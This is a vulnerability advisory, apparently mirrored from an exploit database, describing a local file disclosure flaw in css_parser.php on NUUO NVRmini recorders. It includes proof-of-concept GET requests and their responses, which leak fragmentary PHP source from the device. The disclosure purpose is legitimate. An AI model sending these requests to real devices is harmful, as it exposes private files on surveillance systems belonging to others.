NUUO Local File Disclosure Vulnerability Vendor: NUUO Inc. Product web page: http://www.nuuo.com Affected version: <=3.0.8 (NE-4160, NT-4040) Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always. Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script is not properly verified before being used to include files. This can be exploited to disclose contents of files from local resources. Tested on: GNU/Linux 3.0.8 (armv7l) GNU/Linux 2.6.31.8 (armv5tel) lighttpd/1.4.28 PHP/5.5.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5350 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php 14.01.2016 -- Request: -------- GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1 Response: --------- DatTool '; echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")'; echo ''; touch(constant("FLASH_FOLDER")."/checkdat"); } ?>

Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.

Usermame:
Password:
============================================================================ Request: -------- GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1 Response: --------- $value) { //echo "Key: $key; Value: $value
\n "; if ($key != 'css') { $file = str_replace($key,$value,$file); } //system("echo "Key: $key; Value: $value
\n " >> $filename"); } echo $file; /* foreach(array_reverse($matches[0]) as $match){ $match=preg_replace('/s+/',' ',rtrim(ltrim($match))); $names[]=preg_replace('/s.*//*','',$match); $values[]=preg_replace('/^[^s]*s/','',$match); } */ ?> # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-08]